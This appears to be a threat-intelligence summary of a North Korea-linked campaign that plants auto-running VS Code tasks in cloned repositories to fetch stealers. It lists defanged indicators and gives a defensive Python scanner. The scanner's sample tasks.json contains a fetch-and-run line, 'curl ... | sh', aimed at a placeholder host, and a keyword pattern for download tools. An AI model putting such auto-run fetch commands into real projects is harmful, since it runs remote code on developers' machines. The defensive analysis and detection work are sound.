Latest Contagious Interview malware campaign abuses Microsoft VSCode Tasks

2025-11-29 OSM

https://opensourcemalware.com/blog/contagious-interview-vscode


OpenSourceMalware reports a Contagious Interview campaign, which the report links to North Korean (DPRK) activity, that targets software engineers through recruiter and freelance-work lures, including victims connected to cryptocurrency work. Instead of the more familiar ClickFix-style lure, the infection uses malicious Visual Studio Code tasks files in cloned repositories; once the victim trusts the workspace, tasks run on folder open to fetch OS-specific loaders and establish persistence. The chain retrieves additional JavaScript and Python components, including a BeaverTail crypto stealer that targets dozens of browser wallet extensions and wallet files, then downloads Invisible Ferret from 146.70[.]41[.]188:1224. The report highlights infrastructure such as vscode-setup[.]vercel[.]app, ip-api-check-nine[.]vercel[.]app, api[.]npoint[.]io, and 146.70[.]41[.]188. It says the campaign spans multiple GitHub users, payloads, and versions, which makes developer workstation trust flows a key defensive concern.
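A pre-open check for the behaviour described above, added here as an example and not taken from the OSM report: it lists tasks in a cloned repository that are set to run on folder open. It assumes the standard `runOptions.runOn: "folderOpen"` key of VS Code's tasks schema; the hint list, function names and sample file are constructed for illustration.

```python
import json, re, tempfile
from pathlib import Path

# Assumed hint list for commands that pull remote content; tune for your environment.
FETCH_HINTS = re.compile(r"\b(curl|wget|invoke-webrequest|iwr)\b|https?://", re.I)
_STR = r'("(?:\\.|[^"\\])*")'  # a JSON string literal, kept untouched by the passes below

def strip_jsonc(text):
    """tasks.json is JSON with comments: drop comments, then trailing commas."""
    keep = lambda m: m.group(1) or ""
    text = re.sub(_STR + r"|//[^\n]*|/\*.*?\*/", keep, text, flags=re.S)
    return re.sub(_STR + r"|,(?=\s*[}\]])", keep, text)

def auto_run_tasks(repo):
    """List tasks under repo that are configured to start when the folder is opened."""
    findings = []
    for path in Path(repo).rglob(".vscode/tasks.json"):
        try:
            doc = json.loads(strip_jsonc(path.read_text(encoding="utf-8", errors="replace")))
        except json.JSONDecodeError:
            findings.append({"file": str(path), "label": "<unparseable>", "fetches": None})
            continue
        for task in (doc.get("tasks", []) if isinstance(doc, dict) else []):
            if not isinstance(task, dict) or (task.get("runOptions") or {}).get("runOn") != "folderOpen":
                continue
            # Per-OS overrides can replace the command, so inspect them as well.
            parts = [task] + [task[k] for k in ("windows", "osx", "linux") if isinstance(task.get(k), dict)]
            cmd = " ".join(json.dumps([p.get("command"), p.get("args")]) for p in parts)
            findings.append({"file": str(path), "label": task.get("label"),
                             "fetches": bool(FETCH_HINTS.search(cmd))})
    return findings

# Constructed sample file (placeholder URL), not taken from the campaign.
SAMPLE = """{
  // comments and trailing commas are legal in tasks.json
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "env-setup", "type": "shell", "command": "echo ok",
     "osx": {"command": "curl -s https://example.invalid/setup | sh"},
     "runOptions": {"runOn": "folderOpen"},},
  ]
}"""

def demo():
    with tempfile.TemporaryDirectory() as repo:
        Path(repo, ".vscode").mkdir()
        Path(repo, ".vscode", "tasks.json").write_text(SAMPLE, encoding="utf-8")
        return auto_run_tasks(repo)
```

Run `auto_run_tasks` on a fresh clone before opening it in the editor; setting `task.allowAutomaticTasks` to `off` in VS Code user settings blocks folder-open tasks regardless of workspace trust.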
